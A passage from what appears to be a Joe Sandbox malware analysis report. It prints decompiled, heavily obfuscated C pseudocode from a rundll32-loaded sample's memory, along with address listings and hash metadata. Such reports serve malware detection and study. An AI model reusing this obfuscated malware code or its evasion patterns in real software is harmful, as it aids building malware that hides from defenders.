                                                                                                                    				_v560 = _v560 * 0x5e;
                                                                                                                    				_v560 = _v560 ^ 0x00ac5e2c;
                                                                                                                    				_v568 = 0x587b3f;
                                                                                                                    				_v568 = _v568 >> 1;
                                                                                                                    				_v568 = _v568 >> 6;
                                                                                                                    				_v568 = _v568 + 0x3200;
                                                                                                                    				_v568 = _v568 ^ 0x000d20ef;
                                                                                                                    				_v540 = 0x1767bf;
                                                                                                                    				_v540 = _v540 >> 0xa;
                                                                                                                    				_v540 = _v540 ^ 0x00010300;
                                                                                                                    				_v548 = 0xad8e3d;
                                                                                                                    				_v548 = _v548 ^ 0x5762e507;
                                                                                                                    				_v548 = _v548 ^ 0xbd28358e;
                                                                                                                    				_v548 = _v548 ^ 0xeae8e106;
                                                                                                                    				_v584 = 0xa1a61c;
                                                                                                                    				_v584 = _v584 * 0x38;
                                                                                                                    				_v584 = _v584 + 0xffff1963;
                                                                                                                    				_v584 = _v584 | 0xaacebf86;
                                                                                                                    				_v584 = _v584 ^ 0xabd4b38c;
                                                                                                                    				_v556 = 0xa4c35b;
                                                                                                                    				_v556 = _v556 / _t189;
                                                                                                                    				_v556 = _v556 | 0xf6aeb391;
                                                                                                                    				_v556 = _v556 ^ 0xf6ac7ee7;
                                                                                                                    				_v536 = 0xf31b8a;
                                                                                                                    				_v536 = _v536 | 0x87603e20;
                                                                                                                    				_v536 = _v536 ^ 0x87f7aca9;
                                                                                                                    				_v576 = 0x423791;
                                                                                                                    				_v576 = _v576 + 0xffffb580;
                                                                                                                    				_v576 = _v576 + 0x7a73;
                                                                                                                    				_v576 = _v576 ^ 0x7a6e2c80;
                                                                                                                    				_v576 = _v576 ^ 0x7a24ad4c;
                                                                                                                    				_v544 = 0x7ccdad;
                                                                                                                    				_v544 = _v544 << 7;
                                                                                                                    				_v544 = _v544 ^ 0x3e66d3ae;
                                                                                                                    				_v572 = 0x1eeccc;
                                                                                                                    				_v572 = _v572 | 0x2c9b1d75;
                                                                                                                    				_v572 = _v572 << 6;
                                                                                                                    				_t190 = 0x5b;
                                                                                                                    				_v572 = _v572 / _t190;
                                                                                                                    				_v572 = _v572 ^ 0x007e2283;
                                                                                                                    				_v552 = 0x119b6d;
                                                                                                                    				_t191 = 0x5a;
                                                                                                                    				_v552 = _v552 / _t191;
                                                                                                                    				_v552 = _v552 ^ 0xceecc8a8;
                                                                                                                    				_v552 = _v552 ^ 0xceebe4d8;
                                                                                                                    				_v580 = 0x5ef79f;
                                                                                                                    				_v580 = _v580 / _t187;
                                                                                                                    				_v580 = _v580 | 0x8cf80c97;
                                                                                                                    				_t192 = 0x3d;
                                                                                                                    				_v580 = _v580 / _t192;
                                                                                                                    				_v580 = _v580 ^ 0x02499ffb;
                                                                                                                    				do {
                                                                                                                    					while(_t168 != 0xc65bb2) {
                                                                                                                    						if(_t168 == 0x63f282e) {
                                                                                                                    							_t162 = E0034DA22(_v560, _v568, __eflags, _v540,  &_v520, _t168, _v548);
                                                                                                                    							_t197 =  &(_t197[4]);
                                                                                                                    							_t168 = 0xc65bb2;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t168 == 0xb3c9692) {
                                                                                                                    							_t164 =  *0x353e10; // 0x0
                                                                                                                    							__eflags = _t164 + 0x1c;
                                                                                                                    							return E00333BC0(_v544, _v572, _t195, _v552, _v580, _t164 + 0x1c);
                                                                                                                    						}
                                                                                                                    						if(_t168 != 0xe71c2f1) {
                                                                                                                    							goto L15;
                                                                                                                    						}
                                                                                                                    						_t168 = 0x63f282e;
                                                                                                                    					}
                                                                                                                    					_v564 = 0x8b8c25;
                                                                                                                    					_v564 = _v564 * 0x78;
                                                                                                                    					_v564 = _v564 + 0xffff9cfb;
                                                                                                                    					_v564 = _v564 ^ 0x41694e51;
                                                                                                                    					_t161 = E0033CB52(_v584,  &_v520, _v556, _v536, _v576);
                                                                                                                    					_t197 =  &(_t197[3]);
                                                                                                                    					_t195 =  &_v520 + _t161 * 2;
                                                                                                                    					while(1) {
                                                                                                                    						_t162 =  &_v520;
                                                                                                                    						__eflags = _t195 - _t162;
                                                                                                                    						if(_t195 <= _t162) {
                                                                                                                    							break;
                                                                                                                    						}
                                                                                                                    						__eflags =  *_t195 - 0x5c;
                                                                                                                    						if( *_t195 != 0x5c) {
                                                                                                                    							L10:
                                                                                                                    							_t195 = _t195 - 2;
                                                                                                                    							__eflags = _t195;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						_t139 =  &_v564;
                                                                                                                    						 *_t139 = _v564 - 1;
                                                                                                                    						__eflags =  *_t139;
                                                                                                                    						if( *_t139 == 0) {
                                                                                                                    							__eflags = _t195;
                                                                                                                    							L14:
                                                                                                                    							_t168 = 0xb3c9692;
                                                                                                                    							goto L15;
                                                                                                                    						}
                                                                                                                    						goto L10;
                                                                                                                    					}
                                                                                                                    					goto L14;
                                                                                                                    					L15:
                                                                                                                    					__eflags = _t168 - 0x6143c47;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				return _t162;
                                                                                                                    			}































                                                                                                                    0x0033a67a
                                                                                                                    0x0033a682
                                                                                                                    0x0033a68a
                                                                                                                    0x0033a692
                                                                                                                    0x0033a69a
                                                                                                                    0x0033a69f
                                                                                                                    0x0033a6a7
                                                                                                                    0x0033a6af
                                                                                                                    0x0033a6b7
                                                                                                                    0x0033a6c0
                                                                                                                    0x0033a6c5
                                                                                                                    0x0033a6c9
                                                                                                                    0x0033a6d1
                                                                                                                    0x0033a6df
                                                                                                                    0x0033a6e4
                                                                                                                    0x0033a6e8
                                                                                                                    0x0033a6f0
                                                                                                                    0x0033a6f8
                                                                                                                    0x0033a706
                                                                                                                    0x0033a70a
                                                                                                                    0x0033a71a
                                                                                                                    0x0033a726
                                                                                                                    0x0033a72f
                                                                                                                    0x0033a73c
                                                                                                                    0x0033a73c
                                                                                                                    0x0033a742
                                                                                                                    0x0033a772
                                                                                                                    0x0033a777
                                                                                                                    0x0033a77a
                                                                                                                    0x00000000
                                                                                                                    0x0033a77a
                                                                                                                    0x0033a746
                                                                                                                    0x0033a7f0
                                                                                                                    0x0033a7f5
                                                                                                                    0x00000000
                                                                                                                    0x0033a80f
                                                                                                                    0x0033a752
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a758
                                                                                                                    0x0033a758
                                                                                                                    0x0033a77e
                                                                                                                    0x0033a78f
                                                                                                                    0x0033a793
                                                                                                                    0x0033a79b
                                                                                                                    0x0033a7b3
                                                                                                                    0x0033a7bc
                                                                                                                    0x0033a7bf
                                                                                                                    0x0033a7d3
                                                                                                                    0x0033a7d3
                                                                                                                    0x0033a7d7
                                                                                                                    0x0033a7d9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a7c4
                                                                                                                    0x0033a7c8
                                                                                                                    0x0033a7d0
                                                                                                                    0x0033a7d0
                                                                                                                    0x0033a7d0
                                                                                                                    0x00000000
                                                                                                                    0x0033a7d0
                                                                                                                    0x0033a7ca
                                                                                                                    0x0033a7ca
                                                                                                                    0x0033a7ca
                                                                                                                    0x0033a7ce
                                                                                                                    0x0033a7dd
                                                                                                                    0x0033a7e0
                                                                                                                    0x0033a7e0
                                                                                                                    0x00000000
                                                                                                                    0x0033a7e0
                                                                                                                    0x00000000
                                                                                                                    0x0033a7ce
                                                                                                                    0x00000000
                                                                                                                    0x0033a7e2
                                                                                                                    0x0033a7e2
                                                                                                                    0x0033a7e2
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: QNiA$sz
                                                                                                                    • API String ID: 0-294658094
                                                                                                                    • Opcode ID: 1f4941f720a8779093e3a8e717afcec7fb2842502ca3bffc690faba2b4534d0a
                                                                                                                    • Instruction ID: e84cfefc93233835e0451a302956ca89210680984ee59740d2f27b18808b368e
                                                                                                                    • Opcode Fuzzy Hash: 1f4941f720a8779093e3a8e717afcec7fb2842502ca3bffc690faba2b4534d0a
                                                                                                                    • Instruction Fuzzy Hash: 21715131509341ABC398CF66D98981FBBF1FBC4718F404A1DF5C6AA260D3758A098F87
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00340B19(void* __ecx) {
                                                                                                                    				intOrPtr _v4;
                                                                                                                    				intOrPtr _v8;
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				intOrPtr _v72;
                                                                                                                    				void* _t160;
                                                                                                                    				void* _t164;
                                                                                                                    				signed int _t166;
                                                                                                                    				signed int _t167;
                                                                                                                    				signed int _t168;
                                                                                                                    				signed int _t169;
                                                                                                                    				signed int _t170;
                                                                                                                    				intOrPtr _t190;
                                                                                                                    				intOrPtr* _t191;
                                                                                                                    				intOrPtr* _t192;
                                                                                                                    				signed int* _t194;
                                                                                                                    
                                                                                                                    				_t194 =  &_v68;
                                                                                                                    				_v12 = 0xec215;
                                                                                                                    				_v8 = 0x867af3;
                                                                                                                    				_t190 =  *0x353208; // 0x0
                                                                                                                    				_v4 = 0;
                                                                                                                    				_t164 = __ecx;
                                                                                                                    				_v64 = 0x2d9572;
                                                                                                                    				_t191 = _t190 + 0x20c;
                                                                                                                    				_v64 = _v64 + 0xffff7051;
                                                                                                                    				_v64 = _v64 ^ 0xb4c09ebb;
                                                                                                                    				_v64 = _v64 | 0x08f8e0e6;
                                                                                                                    				_v64 = _v64 ^ 0xbcfdfbfe;
                                                                                                                    				_v40 = 0xaf9231;
                                                                                                                    				_v40 = _v40 + 0x3789;
                                                                                                                    				_v40 = _v40 + 0x1acf;
                                                                                                                    				_v40 = _v40 ^ 0x00adbfc0;
                                                                                                                    				_v68 = 0xf5f340;
                                                                                                                    				_v68 = _v68 ^ 0x3b0075db;
                                                                                                                    				_v68 = _v68 >> 1;
                                                                                                                    				_v68 = _v68 + 0xaae2;
                                                                                                                    				_v68 = _v68 ^ 0x1dff90e5;
                                                                                                                    				_v24 = 0xe1803e;
                                                                                                                    				_v24 = _v24 + 0x946c;
                                                                                                                    				_v24 = _v24 ^ 0x00ebebe2;
                                                                                                                    				_v44 = 0xcb8087;
                                                                                                                    				_t166 = 0x7f;
                                                                                                                    				_v44 = _v44 / _t166;
                                                                                                                    				_v44 = _v44 << 5;
                                                                                                                    				_v44 = _v44 ^ 0x00394faa;
                                                                                                                    				_v32 = 0x6e7c9c;
                                                                                                                    				_v32 = _v32 << 0xf;
                                                                                                                    				_v32 = _v32 >> 6;
                                                                                                                    				_v32 = _v32 ^ 0x00f599ec;
                                                                                                                    				_v36 = 0x8d7ece;
                                                                                                                    				_v36 = _v36 + 0xd96f;
                                                                                                                    				_v36 = _v36 + 0x3e8b;
                                                                                                                    				_v36 = _v36 ^ 0x008d6b01;
                                                                                                                    				_v60 = 0x740a18;
                                                                                                                    				_v60 = _v60 + 0x5af6;
                                                                                                                    				_t167 = 0x2d;
                                                                                                                    				_v60 = _v60 / _t167;
                                                                                                                    				_t168 = 0xc;
                                                                                                                    				_v60 = _v60 / _t168;
                                                                                                                    				_v60 = _v60 ^ 0x000f4a79;
                                                                                                                    				_v48 = 0xecd979;
                                                                                                                    				_v48 = _v48 + 0xffff2496;
                                                                                                                    				_t169 = 3;
                                                                                                                    				_v48 = _v48 / _t169;
                                                                                                                    				_v48 = _v48 ^ 0xbc9c03a4;
                                                                                                                    				_v48 = _v48 ^ 0xbcdb2390;
                                                                                                                    				_v52 = 0x17ff93;
                                                                                                                    				_v52 = _v52 << 0xd;
                                                                                                                    				_v52 = _v52 + 0x3109;
                                                                                                                    				_v52 = _v52 ^ 0x7590f195;
                                                                                                                    				_v52 = _v52 ^ 0x8a641707;
                                                                                                                    				_v20 = 0x28811b;
                                                                                                                    				_v20 = _v20 * 0x25;
                                                                                                                    				_v20 = _v20 ^ 0x05ddec85;
                                                                                                                    				_v56 = 0x23ad29;
                                                                                                                    				_t170 = 0x5a;
                                                                                                                    				_v56 = _v56 / _t170;
                                                                                                                    				_v56 = _v56 >> 8;
                                                                                                                    				_v56 = _v56 ^ 0x06fabbcf;
                                                                                                                    				_v56 = _v56 ^ 0x06fdb2ad;
                                                                                                                    				_v28 = 0x8d9789;
                                                                                                                    				_v28 = _v28 | 0x3813f7c3;
                                                                                                                    				_v28 = _v28 + 0xa24c;
                                                                                                                    				_v28 = _v28 ^ 0x38ab2d0e;
                                                                                                                    				_v16 = 0x83a12;
                                                                                                                    				_v16 = _v16 << 0xb;
                                                                                                                    				_v16 = _v16 ^ 0x41de3db0;
                                                                                                                    				while(1) {
                                                                                                                    					_t192 =  *_t191;
                                                                                                                    					if(_t192 == 0) {
                                                                                                                    						break;
                                                                                                                    					}
                                                                                                                    					if( *((intOrPtr*)(_t192 + 0x38)) == 0) {
                                                                                                                    						L4:
                                                                                                                    						 *_t191 =  *_t192;
                                                                                                                    						_t160 = E00348519(_v28, _v16, _t192);
                                                                                                                    					} else {
                                                                                                                    						_t133 =  &_v40; // 0xebebe2
                                                                                                                    						_t160 = E00338DC4( *_t133, _v68, _v24, _v44,  *((intOrPtr*)(_t192 + 0x2c)), _t164);
                                                                                                                    						_t194 =  &(_t194[4]);
                                                                                                                    						if(_t160 != _v64) {
                                                                                                                    							_t191 = _t192;
                                                                                                                    						} else {
                                                                                                                    							 *((intOrPtr*)(_t192 + 0x1c))( *((intOrPtr*)(_t192 + 0x38)), 0, 0);
                                                                                                                    							E00349E56(_v44, _v48, _v72,  *((intOrPtr*)(_t192 + 0x38)));
                                                                                                                    							E00341E67(_v60, _v64, _v32, _v68,  *((intOrPtr*)(_t192 + 0x2c)));
                                                                                                                    							_t194 =  &(_t194[5]);
                                                                                                                    							goto L4;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				return _t160;
                                                                                                                    			}

































                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 1$
                                                                                                                    • API String ID: 0-209397207
                                                                                                                    • Opcode ID: ffe31568afe234130f2180faa261556fb5a1850211eb848edc669cc9da0fb6fe
                                                                                                                    • Instruction ID: b974f36f4bb465da7cb480c5234fc8f23657acac3b493c401eee50c3441ed6be
                                                                                                                    • Opcode Fuzzy Hash: ffe31568afe234130f2180faa261556fb5a1850211eb848edc669cc9da0fb6fe
                                                                                                                    • Instruction Fuzzy Hash: 40613FB25083419FC399CF21D48940BBBF1FFC9768F509A1DF19696260D7B1EA4A8F42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E0033AEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                    				char _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				void* _t116;
                                                                                                                    				void* _t130;
                                                                                                                    				intOrPtr _t133;
                                                                                                                    				void* _t137;
                                                                                                                    				intOrPtr* _t154;
                                                                                                                    				void* _t155;
                                                                                                                    				signed int _t156;
                                                                                                                    				signed int _t157;
                                                                                                                    				signed int _t158;
                                                                                                                    				signed int _t159;
                                                                                                                    				void* _t161;
                                                                                                                    				void* _t162;
                                                                                                                    
                                                                                                                    				_t135 = _a12;
                                                                                                                    				_push(_a16);
                                                                                                                    				_t154 = __ecx;
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t116);
                                                                                                                    				_v44 = 0xe8605f;
                                                                                                                    				_t162 = _t161 + 0x18;
                                                                                                                    				_v44 = _v44 + 0x84a0;
                                                                                                                    				_v44 = _v44 ^ 0x00e8e4ff;
                                                                                                                    				_t155 = 0;
                                                                                                                    				_v68 = 0xe00e28;
                                                                                                                    				_t137 = 0xc99b7e9;
                                                                                                                    				_v68 = _v68 << 9;
                                                                                                                    				_v68 = _v68 << 2;
                                                                                                                    				_t156 = 0x3b;
                                                                                                                    				_v68 = _v68 / _t156;
                                                                                                                    				_v68 = _v68 ^ 0x0001eb63;
                                                                                                                    				_v76 = 0x5a4023;
                                                                                                                    				_v76 = _v76 >> 0xf;
                                                                                                                    				_t157 = 0x5b;
                                                                                                                    				_v76 = _v76 * 0x13;
                                                                                                                    				_v76 = _v76 ^ 0x64c481b8;
                                                                                                                    				_v76 = _v76 ^ 0x64ccd277;
                                                                                                                    				_v64 = 0xe36df4;
                                                                                                                    				_v64 = _v64 / _t157;
                                                                                                                    				_t158 = 9;
                                                                                                                    				_v64 = _v64 * 0x52;
                                                                                                                    				_v64 = _v64 ^ 0x00c8b522;
                                                                                                                    				_v80 = 0x952e3b;
                                                                                                                    				_v80 = _v80 >> 6;
                                                                                                                    				_v80 = _v80 ^ 0xc023484e;
                                                                                                                    				_v80 = _v80 / _t158;
                                                                                                                    				_v80 = _v80 ^ 0x155df6ec;
                                                                                                                    				_v72 = 0x4bfcfc;
                                                                                                                    				_v72 = _v72 | 0x0a339af0;
                                                                                                                    				_v72 = _v72 << 0xf;
                                                                                                                    				_t159 = 0x12;
                                                                                                                    				_v72 = _v72 / _t159;
                                                                                                                    				_v72 = _v72 ^ 0x0e3e5ce5;
                                                                                                                    				_v40 = 0xc0630c;
                                                                                                                    				_v40 = _v40 | 0x5d0d844d;
                                                                                                                    				_v40 = _v40 ^ 0x5dc4e99c;
                                                                                                                    				_v52 = 0x98b7b;
                                                                                                                    				_v52 = _v52 + 0xa105;
                                                                                                                    				_v52 = _v52 >> 5;
                                                                                                                    				_v52 = _v52 ^ 0x0004c78d;
                                                                                                                    				_v56 = 0xd0814a;
                                                                                                                    				_v56 = _v56 >> 9;
                                                                                                                    				_v56 = _v56 * 0x3e;
                                                                                                                    				_v56 = _v56 ^ 0x001a31dc;
                                                                                                                    				_v60 = 0xb9e1cb;
                                                                                                                    				_v60 = _v60 * 0x25;
                                                                                                                    				_v60 = _v60 << 0xa;
                                                                                                                    				_v60 = _v60 ^ 0x768204a8;
                                                                                                                    				_v48 = 0xccd34a;
                                                                                                                    				_v48 = _v48 + 0xffff20ce;
                                                                                                                    				_v48 = _v48 ^ 0x00ce4dff;
                                                                                                                    				do {
                                                                                                                    					while(_t137 != 0x8f26e2d) {
                                                                                                                    						if(_t137 == 0xc99b7e9) {
                                                                                                                    							_t137 = 0x8f26e2d;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t137 != 0xfe1ef29) {
                                                                                                                    								goto L10;
                                                                                                                    							} else {
                                                                                                                    								_t133 =  *0x353dfc; // 0x0
                                                                                                                    								E0034E274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
                                                                                                                    								_t155 =  ==  ? 1 : _t155;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L5:
                                                                                                                    						return _t155;
                                                                                                                    					}
                                                                                                                    					_push( *_t154);
                                                                                                                    					_t130 = E0034AE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
                                                                                                                    					_t162 = _t162 + 0x14;
                                                                                                                    					if(_t130 == 0) {
                                                                                                                    						_t137 = 0xeaa5f76;
                                                                                                                    						goto L10;
                                                                                                                    					} else {
                                                                                                                    						_t137 = 0xfe1ef29;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					goto L5;
                                                                                                                    					L10:
                                                                                                                    				} while (_t137 != 0xeaa5f76);
                                                                                                                    				goto L5;
                                                                                                                    			}


                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: #@Z$_`
                                                                                                                    • API String ID: 0-2586238014
                                                                                                                    • Opcode ID: 53fd34952857044f453416dfe1c2296bea2076e1f1d3fbb83fb98a566e4aede1
                                                                                                                    • Instruction ID: 4e340844caaaa48466a465d3bea306b20585c2b517594406a72c1c0c3836f43a
                                                                                                                    • Opcode Fuzzy Hash: 53fd34952857044f453416dfe1c2296bea2076e1f1d3fbb83fb98a566e4aede1
                                                                                                                    • Instruction Fuzzy Hash: 7B5135715083009FC759CF22C88681BFBE5FBC8758F509A1DF6969A220C372DA49CF46
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E0033DFF3() {
                                                                                                                    				signed int _v4;
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				intOrPtr _t128;
                                                                                                                    				intOrPtr _t131;
                                                                                                                    				signed int _t133;
                                                                                                                    				signed int _t134;
                                                                                                                    				intOrPtr _t135;
                                                                                                                    				void* _t143;
                                                                                                                    				void* _t146;
                                                                                                                    				signed int* _t148;
                                                                                                                    
                                                                                                                    				_t148 =  &_v52;
                                                                                                                    				_v12 = 0xa1a716;
                                                                                                                    				_v12 = _v12 + 0x2188;
                                                                                                                    				_v12 = _v12 ^ 0x00a02056;
                                                                                                                    				_v32 = 0x472a3;
                                                                                                                    				_v32 = _v32 + 0x22e5;
                                                                                                                    				_v32 = _v32 ^ 0xff9fab52;
                                                                                                                    				_v32 = _v32 ^ 0xff9c5b0a;
                                                                                                                    				_v48 = 0x9a7516;
                                                                                                                    				_v48 = _v48 + 0xffff4702;
                                                                                                                    				_v48 = _v48 * 0x45;
                                                                                                                    				_v48 = _v48 + 0xffff2ff5;
                                                                                                                    				_t146 = 0x4903f33;
                                                                                                                    				_v48 = _v48 ^ 0x296ff1ed;
                                                                                                                    				_v16 = 0xfa3b71;
                                                                                                                    				_v16 = _v16 << 9;
                                                                                                                    				_v16 = _v16 ^ 0xf47f6bba;
                                                                                                                    				_v20 = 0xc0b9b;
                                                                                                                    				_t133 = 0x7b;
                                                                                                                    				_v20 = _v20 * 0x52;
                                                                                                                    				_v20 = _v20 ^ 0x03d2ca7d;
                                                                                                                    				_v36 = 0x400b3e;
                                                                                                                    				_v36 = _v36 ^ 0xba288636;
                                                                                                                    				_v36 = _v36 ^ 0xc4c376ba;
                                                                                                                    				_v36 = _v36 ^ 0x7eaacb92;
                                                                                                                    				_v52 = 0x3419b2;
                                                                                                                    				_v52 = _v52 / _t133;
                                                                                                                    				_v52 = _v52 >> 0xc;
                                                                                                                    				_v52 = _v52 | 0xcef26f8a;
                                                                                                                    				_v52 = _v52 ^ 0xcef1d6cf;
                                                                                                                    				_v4 = 0xb26f64;
                                                                                                                    				_t134 = 3;
                                                                                                                    				_v4 = _v4 / _t134;
                                                                                                                    				_v4 = _v4 ^ 0x003ff5cc;
                                                                                                                    				_v40 = 0x34a33d;
                                                                                                                    				_v40 = _v40 >> 4;
                                                                                                                    				_v40 = _v40 ^ 0xd21b54bd;
                                                                                                                    				_v40 = _v40 ^ 0x33ae4ce0;
                                                                                                                    				_v40 = _v40 ^ 0xe1b00bb7;
                                                                                                                    				_v8 = 0x4c76b4;
                                                                                                                    				_v8 = _v8 << 2;
                                                                                                                    				_v8 = _v8 ^ 0x013e4034;
                                                                                                                    				_v24 = 0x1c9e42;
                                                                                                                    				_v24 = _v24 ^ 0x4f10b4b5;
                                                                                                                    				_v24 = _v24 << 4;
                                                                                                                    				_v24 = _v24 ^ 0xf0cd9088;
                                                                                                                    				_v44 = 0xfe69b1;
                                                                                                                    				_v44 = _v44 >> 0xd;
                                                                                                                    				_v44 = _v44 * 0x49;
                                                                                                                    				_v44 = _v44 * 0x7d;
                                                                                                                    				_v44 = _v44 ^ 0x011db47c;
                                                                                                                    				_v28 = 0x46ec28;
                                                                                                                    				_v28 = _v28 << 9;
                                                                                                                    				_v28 = _v28 * 0x58;
                                                                                                                    				_v28 = _v28 ^ 0xc2551a85;
                                                                                                                    				_t135 =  *0x353e0c; // 0x0
                                                                                                                    				do {
                                                                                                                    					while(_t146 != 0x4903f33) {
                                                                                                                    						if(_t146 == 0x6f617aa) {
                                                                                                                    							_t128 = E003346BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E003381B7, _v28);
                                                                                                                    							_t135 =  *0x353e0c; // 0x0
                                                                                                                    							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
                                                                                                                    						} else {
                                                                                                                    							if(_t146 != 0xc69f0b3) {
                                                                                                                    								goto L6;
                                                                                                                    							} else {
                                                                                                                    								_t131 = E00337AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
                                                                                                                    								_t135 =  *0x353e0c; // 0x0
                                                                                                                    								_t148 =  &(_t148[6]);
                                                                                                                    								_t146 = 0x6f617aa;
                                                                                                                    								 *((intOrPtr*)(_t135 + 8)) = _t131;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L9:
                                                                                                                    						return 0 | _t135 != 0x00000000;
                                                                                                                    					}
                                                                                                                    					_push(_t135);
                                                                                                                    					_push(_t135);
                                                                                                                    					_t143 = 0x24;
                                                                                                                    					_t135 = E00337FF2(_t143);
                                                                                                                    					_t146 = 0xc69f0b3;
                                                                                                                    					 *0x353e0c = _t135;
                                                                                                                    					L6:
                                                                                                                    				} while (_t146 != 0xab42793);
                                                                                                                    				goto L9;
                                                                                                                    			}


                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (F$"
                                                                                                                    • API String ID: 0-1034852068
                                                                                                                    • Opcode ID: 38a1198c4fee8ae2d1e2d713ebf0b527a02ebc434f01c0f53c27bc838593f8d0
                                                                                                                    • Instruction ID: ae5c9dd4d891006aae96af09c0ac221728c77cd78301d7e7043f0fa72cf1199b
                                                                                                                    • Opcode Fuzzy Hash: 38a1198c4fee8ae2d1e2d713ebf0b527a02ebc434f01c0f53c27bc838593f8d0
                                                                                                                    • Instruction Fuzzy Hash: 395134724093019FC359CF25D98A80FBBE1EBD4758F108A1DF595AA260D3B1DA09CF87
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00337C37(void* __ecx, void* __edx) {
                                                                                                                    				void* _t91;
                                                                                                                    				void* _t102;
                                                                                                                    				signed short _t108;
                                                                                                                    				signed short _t111;
                                                                                                                    				signed short _t113;
                                                                                                                    				signed int _t115;
                                                                                                                    				signed int _t116;
                                                                                                                    				signed int _t117;
                                                                                                                    				signed short _t121;
                                                                                                                    				intOrPtr _t128;
